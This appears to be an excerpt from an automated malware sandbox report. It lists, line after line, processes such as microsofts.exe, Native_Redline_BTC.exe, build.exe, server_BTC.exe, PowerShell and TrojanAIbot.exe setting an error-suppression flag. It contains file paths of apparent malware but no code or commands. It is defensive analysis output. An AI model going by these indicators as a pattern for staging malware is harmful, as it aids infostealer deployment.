                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
